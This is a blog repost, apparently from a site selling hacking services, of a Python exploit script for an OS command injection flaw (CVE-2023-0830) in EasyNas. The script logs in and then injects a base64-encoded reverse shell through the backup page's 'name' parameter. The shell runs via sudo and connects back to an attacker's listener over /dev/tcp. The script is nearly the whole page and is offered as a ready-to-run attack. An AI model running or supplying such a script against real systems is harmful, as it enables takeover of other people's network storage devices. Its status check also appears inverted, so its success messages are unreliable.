Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86395807

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: EasyNas 1.1.0 - OS Command Injection
# Date: 2023-02-9
# Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com)
# Author Blog: https://xbz0n.medium.com
# Version: 1.0.0
# Vendor home page : https://www.easynas.org
# Authentication Required: Yes
# CVE : CVE-2023-0830

#!/usr/bin/python3

import requests
import sys
import base64
import urllib.parse
import time

from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable the insecure request warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) < 6:
    print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
    sys.exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Create the payload
payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])

# Encode the payload in base64
payload = base64.b64encode(payload.encode()).decode()

# URL encode the payload
payload = urllib.parse.quote(payload)

# Create the login data
login_data = {
    'usr':user,
    'pwd':password,
    'action':'login'
}

# Create a session
session = requests.Session()

# Send the login request
print("Sending login request...")
login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False)

# Check if the login was successful
if 'Login to EasyNAS' in login_response.text:
    print("Unsuccessful login")
    sys.exit()
else:
    print("Login successful")


# send the exploit request
timeout = 3

try:
    exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)
    if exploit_response.status_code != 200:
        print("[+] Everything seems ok, check your listener.")
    else:
        print("[-] Exploit failed, system is patched or credentials are wrong.")

except requests.exceptions.ReadTimeout:
    print("[-] Everything seems ok, check your listener.")
    sys.exit()